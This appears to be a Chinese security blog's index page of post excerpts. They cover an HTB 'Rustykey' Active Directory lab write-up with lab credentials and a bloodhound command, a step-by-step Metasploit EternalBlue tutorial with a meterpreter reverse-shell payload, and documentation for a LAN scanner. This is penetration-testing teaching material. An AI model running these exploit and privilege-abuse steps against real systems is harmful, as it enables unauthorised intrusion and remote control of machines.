BenD

能看到很多一起东西，希望别勾起你们的回忆 1下载地址:https://wwvs.lanzoue.com/iQD962exqsed

HTB-Rustykey条件：rr.parker / 8#t5HE8L!W3A 扫描靶机 1nmap -A -v -T4 10.10.11.75 得到了rustykey.htb域名，写到hosts里面，使用ldap协议获得UPN信息（userPrincipalName） 将ldap里面的Users表单导出做成用户表，然后使用bh导出内网环境 1bloodhound-python -u rr.parker -p '8#t5HE8L!W3A' -d rustykey.htb -ns 10.10.11.75 -c All --zip 可以看到HELPDESK组对T-COMPUTER3.RUSTYKEY.HTB主机有Addself作用 说明这个主机可以添加到这个组里面 然后查看一下HELPDESK组，可以修改这4个用户的密码，分别是 1234BB.MORGANGG.ANDERSONDD.ALIEE.REED 除了可以修改这四个用户的密码，还对PROTECTED OBJECTS这个组有AddMember的属性 然后继续分析其他的关系，在H...

扫描器的使用use auxiliary/scanner/smb/smb_ms17_010 攻击模块的使用下一步操作：发起攻击 (Exploit) 既然扫描器已经告诉你目标是“易受攻击”的，你现在的动作应该是从 辅助模块（Scanner） 切换到 攻击模块（Exploit）。 请按照以下顺序输入命令： 切换模块： Bash 1use exploit/windows/smb/ms17_010_eternalblue 设置目标 IP： Bash 1set RHOSTS 192.168.20.135 设置攻击载荷（通常默认就是这个，但建议检查一下）： Bash 1set PAYLOAD windows/x64/meterpreter/reverse_tcp 设置你自己的 IP（Kali 的 IP，用于接收反弹回来的 Shell）： Bash 12# 先在另一个终端用 ip addr 确认你的网卡 IPset LHOST [你的Kali的IP] 开火攻击： Bash 1exploit 进入Windows之后的操作 1. 基础环境与权限感知在任何操作...

🌐 局域网扫描器 - 开发与使用文档项目地址：https://github.com/benbenbendang/scanner_nmap 1. 项目简介本项目是一个基于 Python 开发的局域网主机扫描工具。它不仅具备强大的网络探测功能，更拥有独特的赛博朋克 (Cyberpunk) 风格图形界面。软件旨在帮助网络管理员或极客用户快速识别当前网段内的存活主机、检测操作系统类型以及开放端口。 2. 功能特性 (Features)🛠 核心功能 网卡自动识别：启动时自动读取系统网络接口信息（IP/子网掩码），支持用户下拉选择目标网卡。 ARP 存活扫描：利用 ARP 协议（二层网络）快速、准确地发现同一局域网内的所有在线设备。 操作系统指纹识别：通过发送 ICMP 数据包并分析 TTL（生存时间）值，启发式地判断目标是 Windows、Linux/Android 还是网络设备。 端口安全检测：对发现的主机进行常用端口（如 21, 22, 80, 445, 3389 等）扫描，评估开放服务情况。 多线程处理：扫描过程在独立线程中运行，保证界面流畅不卡顿，并提供实...